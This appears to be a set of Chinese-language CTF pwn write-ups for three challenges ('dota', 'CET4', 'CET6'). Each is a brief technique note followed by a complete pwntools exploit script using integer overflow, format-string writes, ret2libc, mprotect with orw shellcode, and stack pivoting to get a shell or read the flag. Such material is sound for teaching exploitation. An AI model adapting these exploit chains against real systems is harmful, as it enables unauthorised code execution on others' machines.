dota:
考点:
- 整数溢出
- ret2libc
exp:
from pwn import *
# p = process("./dota")
p = remote("pwn.challenge.ctf.show",28127)
e = ELF("./dota")
p.timeout = 0.5
context.log_level = 'debug'
libc = e.libc
p.recvuntil("--------\n")
p.recvuntil("--------\n")
p.sendline("dota")
p.recvuntil("--------\n")
p.recvuntil("--------\n")
p.recvuntil("--------\n")
p.recvuntil("--------\n")
p.sendline('2147483648')
p.recvuntil("--------\n")
p.recvuntil("--------\n")
p.recvline()
stack_addr = p.recvline()
log.success(stack_addr)
p.sendline("%25c%9$n"+p64(int(stack_addr,16)))
p.recvline()
pl1 = "a"*(0x88)
pop_rdi = 0x4009b3
pop_rsi = 0x4009b1
puts_got = e.got["puts"]
pl1 += p64(pop_rdi) + p64(puts_got)+p64(0x4005e0) + p64(0x400812)
p.sendline(pl1)
puts_addr = u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
libc_base = puts_addr - 0x0809c0
log.success(hex(puts_addr))
p.recvuntil("--------\n")
p.recvuntil("--------\n")
p.sendline("dota")
p.recvuntil("--------\n")
p.recvuntil("--------\n")
p.recvuntil("--------\n")
p.recvuntil("--------\n")
p.sendline('2147483648')
p.recvuntil("--------\n")
p.recvuntil("--------\n")
p.recvline()
stack_addr = p.recvline()
log.success(stack_addr)
p.sendline("%25c%9$n"+p64(int(stack_addr,16)))
p.recvline()
sys = libc_base + 0x04f440
sh = libc_base + 0x1b3e9a
pl2 = "a"*(0x88)+p64(0X4005CE) + p64(pop_rdi) + p64(sh) + p64(sys)
p.sendline(pl2)
p.interactive()
CET4:
mprotect 函数解析
- 开沙箱 ret2libc + orw
exp:
from pwn import *
p = process("./CET4")
e = ELF("./CET4")
context.log_level = 'debug'
libc = e.libc
context.arch ="amd64"
puts_plt = e.plt["puts"]
puts_got = e.got["puts"]
pop_rdi =0x4013d3
pop_rsi_r15 = 0x4013d1
bss = 0x404000
main = 0x401290
p.recvuntil("your name:\n")
p.send("a"*(0x4))
p.recvuntil("QAQ:How was your test???")
pl1 = "a"*(0x48) + p64(pop_rdi)+p64(puts_got) + p64(puts_plt) + p64(main)
p.send(pl1)
puts_addr = u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
log.success(hex(puts_addr))
libc_base = puts_addr - libc.sym["puts"]
protect = libc_base + libc.sym["mprotect"]
pop_rdx = 0x1b92 +libc_base
pop_rsi = 0x202f8 + libc_base
p.recvuntil("your name:\n")
p.send("a"*(0x4))
p.recvuntil("QAQ:How was your test???")
pl2 = "a"*(0x48) + p64(pop_rdi) + p64(0x404000) + p64(pop_rsi) + p64(0x1000) + p64(pop_rdx)+ p64(7)+p64(protect) + p64(main)
# gdb.attach(p,"b *0x4013d3")
p.send(pl2)
read=libc_base+libc.sym['read']
p.recvuntil("your name:\n")
p.send("a"*(0x4))
p.recvuntil("QAQ:How was your test???")
pl3 = "a"*(0x48) + p64(pop_rdi) + p64(0) + p64(pop_rsi) + p64(0x404600) + p64(pop_rdx) + p64(0x500) + p64(read) + p64(0x404600)
# gdb.attach(p,"b *0x4013d3")
p.send(pl3)
code = shellcraft.open("./flag")
code += shellcraft.read(3, 0x404900, 0x50)
code += shellcraft.write(1, 0x404900, 0x50)
shellcode = asm(code)
p.send(shellcode)
p.interactive()
CET6:
- 栈迁移+汇编调试
exp:
from pwn import *
p = process("./CET6")
e = ELF("./CET6")
context.log_level = 'debug'
libc = e.libc
context.arch ="amd64"
pop_rdi = 0x4012f3
p.recvuntil("your name:\n")
p.sendline("a"*(4))
p.recvuntil("QAQ:How was your test???\n")
pl1 = "a"*(0x40) + p64(0x404500)
pl1 += p64(0x4011ae)
p.send(pl1)
pl2 = "a"*(0x40) + p64(0x404540)
pl2+= p64(0x4011ae)
# gdb.attach(p,'b *0x4011ae')
p.send(pl2)
puts_got = e.got["puts"]
puts_plt = e.plt["puts"]
pl3 = "a"*(0x8) + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(0x4011ae)
p.send(pl3)
libc_base=u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))-libc.sym['puts']
success('libc_base:'+hex(libc_base))
sh=libc_base+libc.search('/bin/sh\x00').next()
system=libc_base+libc.sym['system']
p.send('a'*0x20+p64(pop_rdi)+p64(sh)+p64(system))
p.interactive()